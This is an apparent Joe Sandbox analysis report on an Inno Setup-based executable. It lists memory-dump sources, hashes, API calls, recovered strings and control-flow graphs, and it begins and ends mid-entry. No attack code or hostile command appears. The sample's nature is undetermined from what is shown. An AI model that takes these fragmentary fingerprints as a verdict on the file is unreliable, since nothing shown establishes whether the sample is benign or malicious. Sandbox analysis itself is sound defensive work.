1988->2007 1989->1885 1994->1885 1995->1994 2007->1989 2009->1885 2016 423fb2-423fbc 2009->2016 2011->1885 2016->1885
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                                    • Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
                                                                                    • Opcode Fuzzy Hash: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                                    • Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08
                                                                                    APIs
                                                                                      • Part of subcall function 00493D2C: GetWindowRect.USER32(00000000), ref: 00493D42
                                                                                    • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466E8B
                                                                                      • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466EA5), ref: 0041D6EB
                                                                                      • Part of subcall function 00466898: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                                      • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                                      • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                                      • Part of subcall function 00466254: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                                      • Part of subcall function 00493FB0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493FBA
                                                                                      • Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                      • Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                      • Part of subcall function 00493C7C: 73A0A570.USER32(00000000,?,?,?), ref: 00493C9E
                                                                                      • Part of subcall function 00493C7C: SelectObject.GDI32(?,00000000), ref: 00493CC4
                                                                                      • Part of subcall function 00493C7C: 73A0A480.USER32(00000000,?,00493D22,00493D1B,?,00000000,?,?,?), ref: 00493D15
                                                                                      • Part of subcall function 00493FA0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493FAA
                                                                                    • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021AD8D0,021AF524,?,?,021AF554,?,?,021AF5A4,?), ref: 00467B3B
                                                                                    • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467B4C
                                                                                    • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467B64
                                                                                      • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                                    • String ID: $(Default)$STOPIMAGE
                                                                                    • API String ID: 3271511185-770201673
                                                                                    • Opcode ID: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                                    • Instruction ID: 7cc469b3bd63a428f44d838a58e066ff967143afc9c1970ffe4cf99f77f4ae1f
                                                                                    • Opcode Fuzzy Hash: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                                    • Instruction Fuzzy Hash: 9DF2C6386005148FCB00EB59D5D9F9973F1FF4A308F1542B6E5049B36ADB78AC4ACB8A
                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
                                                                                    • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                    • String ID: unins$unins???.*
                                                                                    • API String ID: 3541575487-1009660736
                                                                                    • Opcode ID: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                                    • Instruction ID: 4fd1d9fbc71e550ec417509903356e65f0bc22e0d19a654d6a5f314750c2dfa9
                                                                                    • Opcode Fuzzy Hash: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                                    • Instruction Fuzzy Hash: 3D3163746001489FCB20EB65C981AEEB7BDDF84304F5184B6E50CAB2A2DB39DF458F58
                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 004520FD
                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 00452105
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileFindFirstLast
                                                                                    • String ID:
                                                                                    • API String ID: 873889042-0
                                                                                    • Opcode ID: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                                    • Instruction ID: f9611aeb3029889b76a7ade8829495a9d918b249c8fbd3e45bbd36cd3e6629b4
                                                                                    • Opcode Fuzzy Hash: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                                    • Instruction Fuzzy Hash: 1DF04931A04604AB8B10DB6AAD0149FB7FCDB46725710467BFC14E3282EA784E088598
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(?,0046D1AE), ref: 0046D122
                                                                                    • CoCreateInstance.OLE32(00498B64,00000000,00000001,00498B74,?,?,0046D1AE), ref: 0046D13E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstanceVersion
                                                                                    • String ID:
                                                                                    • API String ID: 1462612201-0
                                                                                    • Opcode ID: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                                    • Instruction ID: 1e059e1ff20256b2d38cad76cdb56475a0db9ba99d2cbde6061077ac095a0934
                                                                                    • Opcode Fuzzy Hash: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                                    • Instruction Fuzzy Hash: 56F0A7B0B40301DEEB10AB2ADD46B8B37C19713324F04413BB054962A0E7ED8880CB9F
                                                                                    APIs
                                                                                    • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                    • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                                    • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                    • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                                    APIs
                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: NtdllProc_Window
                                                                                    • String ID:
                                                                                    • API String ID: 4255912815-0
                                                                                    • Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                    • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                    • Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                    • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameUser
                                                                                    • String ID:
                                                                                    • API String ID: 2645101109-0
                                                                                    • Opcode ID: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                                    • Instruction ID: 76809c6cbed83fd478a986dc42ef3113a42af1b7be0c57f55a4460954ad8dcd3
                                                                                    • Opcode Fuzzy Hash: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                                    • Instruction Fuzzy Hash: 54D0CD7534430063C7006AA99C82597358C4784305F00443F7CC5DA2C3E5BDDA88565A
                                                                                    APIs
                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: NtdllProc_Window
                                                                                    • String ID:
                                                                                    • API String ID: 4255912815-0
                                                                                    • Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                    • Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
                                                                                    • Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                    • Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 406 46e080-46e0b2 407 46e0b4-46e0bb 406->407 408 46e0cf 406->408 410 46e0c6-46e0cd 407->410 411 46e0bd-46e0c4 407->411 409 46e0d6-46e10e call 403634 call 403738 call 42dde8 408->409 418 46e110-46e124 call 403738 call 42dde8 409->418 419 46e129-46e152 call 403738 call 42dd0c 409->419 410->409 411->408 411->410 418->419 427 46e154-46e15d call 46dd50 419->427 428 46e162-46e18b call 46de6c 419->428 427->428 432 46e19d-46e1a0 call 403400 428->432 433 46e18d-46e19b call 403494 428->433 437 46e1a5-46e1f0 call 46de6c call 42c40c call 46deb4 call 46de6c 432->437 433->437 446 46e206-46e227 call 454ab8 call 46de6c 437->446 447 46e1f2-46e205 call 46dedc 437->447 454 46e27d-46e284 446->454 455 46e229-46e27c call 46de6c call 478464 call 46de6c call 478464 call 46de6c 446->455 447->446 456 46e286-46e2c3 call 478464 call 46de6c call 478464 call 46de6c 454->456 457 46e2c4-46e2cb 454->457 455->454 456->457 459 46e30c-46e331 call 40b44c call 46de6c 457->459 460 46e2cd-46e30b call 46de6c * 3 457->460 481 46e333-46e33e call 47ad88 459->481 482 46e340-46e349 call 403494 459->482 460->459 491 46e34e-46e51b call 403778 call 46de6c call 47ad88 call 46deb4 call 403494 call 40357c * 2 call 46de6c call 403494 call 40357c * 2 call 46de6c call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 481->491 482->491 556 46e531-46e53f call 46dedc 491->556 557 46e51d-46e52f call 46de6c 491->557 561 46e544 556->561 562 46e545-46e58e call 46dedc call 46df10 call 46de6c call 47ad88 call 46df74 557->562 561->562 573 46e5b4-46e5be 562->573 574 46e590-46e5ae call 46dedc * 2 562->574 576 46e5c4-46e5cb 573->576 577 46e662-46e669 573->577 588 46e5b3 574->588 581 46e62f-46e63a 576->581 582 46e5cd-46e5f1 call 430a40 576->582 578 46e6c3-46e6d9 RegCloseKey 577->578 579 46e66b-46e6a1 call 49314c 577->579 579->578 585 46e63d-46e641 581->585 582->585 592 46e5f3-46e5f4 582->592 585->577 589 46e643-46e65c call 430a7c call 46dedc 585->589 588->573 598 46e661 589->598 594 46e5f6-46e61c call 40b44c call 4780d8 592->594 601 46e61e-46e624 call 430a40 594->601 602 46e629-46e62b 594->602 598->577 601->602 602->594 604 46e62d 602->604 604->585
                                                                                    APIs
                                                                                      • Part of subcall function 0046DE6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                                    • RegCloseKey.ADVAPI32(?,0046E6E1,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E72C,?,?,0049B178,00000000), ref: 0046E6D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseValue
                                                                                    • String ID: " /SILENT$5.4.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                    • API String ID: 3132538880-1122008755
                                                                                    • Opcode ID: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                                    • Instruction ID: d6e88d1f6cb7b2cefc9fba2fbd39931f8be9331f85677ee55fb68547bd3bf3cf
                                                                                    • Opcode Fuzzy Hash: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                                    • Instruction Fuzzy Hash: C3123034F001089BCB04EB56E981ADE77F5EF58304F60807BE8116B3A5EB79AD45CB5A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1019 490c98-490ccc call 403684 1022 490cce-490cdd call 4467f0 Sleep 1019->1022 1023 490ce2-490cef call 403684 1019->1023 1028 491172-49118c call 403420 1022->1028 1029 490d1e-490d2b call 403684 1023->1029 1030 490cf1-490d19 call 44684c call 403738 FindWindowA call 446acc 1023->1030 1038 490d5a-490d67 call 403684 1029->1038 1039 490d2d-490d50 call 44684c call 403738 FindWindowA call 446acc 1029->1039 1030->1028 1047 490d69-490dab call 4467f0 * 4 SendMessageA call 446acc 1038->1047 1048 490db0-490dbd call 403684 1038->1048 1056 490d55 1039->1056 1047->1028 1057 490e0c-490e19 call 403684 1048->1057 1058 490dbf-490e07 call 4467f0 * 4 PostMessageA call 446924 1048->1058 1056->1028 1066 490e68-490e75 call 403684 1057->1066 1067 490e1b-490e63 call 4467f0 * 4 SendNotifyMessageA call 446924 1057->1067 1058->1028 1079 490ea2-490eaf call 403684 1066->1079 1080 490e77-490e9d call 44684c call 403738 RegisterClipboardFormatA call 446acc 1066->1080 1067->1028 1094 490eb1-490eeb call 4467f0 * 3 SendMessageA call 446acc 1079->1094 1095 490ef0-490efd call 403684 1079->1095 1080->1028 1094->1028 1107 490eff-490f3f call 4467f0 * 3 PostMessageA call 446924 1095->1107 1108 490f44-490f51 call 403684 1095->1108 1107->1028 1119 490f98-490fa5 call 403684 1108->1119 1120 490f53-490f93 call 4467f0 * 3 SendNotifyMessageA call 446924 1108->1120 1130 490ffa-491007 call 403684 1119->1130 1131 490fa7-490fc5 call 44684c call 42e2bc 1119->1131 1120->1028 1142 491009-491035 call 44684c call 403738 call 4467f0 GetProcAddress 1130->1142 1143 491081-49108e call 403684 1130->1143 1151 490fd7-490fe5 GetLastError call 446acc 1131->1151 1152 490fc7-490fd5 call 446acc 1131->1152 1176 491071-49107c call 446924 1142->1176 1177 491037-49106c call 4467f0 * 2 call 446acc call 446924 1142->1177 1157 491090-4910b1 call 4467f0 FreeLibrary call 446924 1143->1157 1158 4910b6-4910c3 call 403684 1143->1158 1163 490fea-490ff5 call 446acc 1151->1163 1152->1163 1157->1028 1169 4910e8-4910f5 call 403684 1158->1169 1170 4910c5-4910e3 call 44684c call 403738 CreateMutexA 1158->1170 1163->1028 1185 49112b-491138 call 403684 1169->1185 1186 4910f7-491129 call 48ae84 call 403574 call 403738 OemToCharBuffA call 48ae9c 1169->1186 1170->1028 1176->1028 1177->1028 1195 49113a-49116c call 48ae84 call 403574 call 403738 CharToOemBuffA call 48ae9c 1185->1195 1196 49116e 1185->1196 1186->1028 1195->1028 1196->1028
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,00000000,0049118D,?,?,?,?,00000000,00000000,00000000), ref: 00490CD8
                                                                                    • FindWindowA.USER32(00000000,00000000), ref: 00490D09
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindSleepWindow
                                                                                    • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                    • API String ID: 3078808852-3310373309
                                                                                    • Opcode ID: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                                    • Instruction ID: 3689c34fe079b887eecbe3c8abd258a9be24a9666ebde3bfb919725182042c62
                                                                                    • Opcode Fuzzy Hash: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                                    • Instruction Fuzzy Hash: 8EC19C60B002026BDB14BB3E8C8291E599A9FC9708B11D93FF546EB79ACD3DDD06435E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1573 481df0-481e15 GetModuleHandleA GetProcAddress 1574 481e7c-481e81 GetSystemInfo 1573->1574 1575 481e17-481e2d GetNativeSystemInfo GetProcAddress 1573->1575 1576 481e86-481e8f 1574->1576 1575->1576 1577 481e2f-481e3a GetCurrentProcess 1575->1577 1578 481e9f-481ea6 1576->1578 1579 481e91-481e95 1576->1579 1577->1576 1586 481e3c-481e40 1577->1586 1582 481ec1-481ec6 1578->1582 1580 481ea8-481eaf 1579->1580 1581 481e97-481e9b 1579->1581 1580->1582 1584 481e9d-481eba 1581->1584 1585 481eb1-481eb8 1581->1585 1584->1582 1585->1582 1586->1576 1588 481e42-481e49 call 451d7c 1586->1588 1588->1576 1591 481e4b-481e58 GetProcAddress 1588->1591 1591->1576 1592 481e5a-481e71 GetModuleHandleA GetProcAddress 1591->1592 1592->1576 1593 481e73-481e7a 1592->1593 1593->1576
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00481E0E
                                                                                    • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481E6A
                                                                                    • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
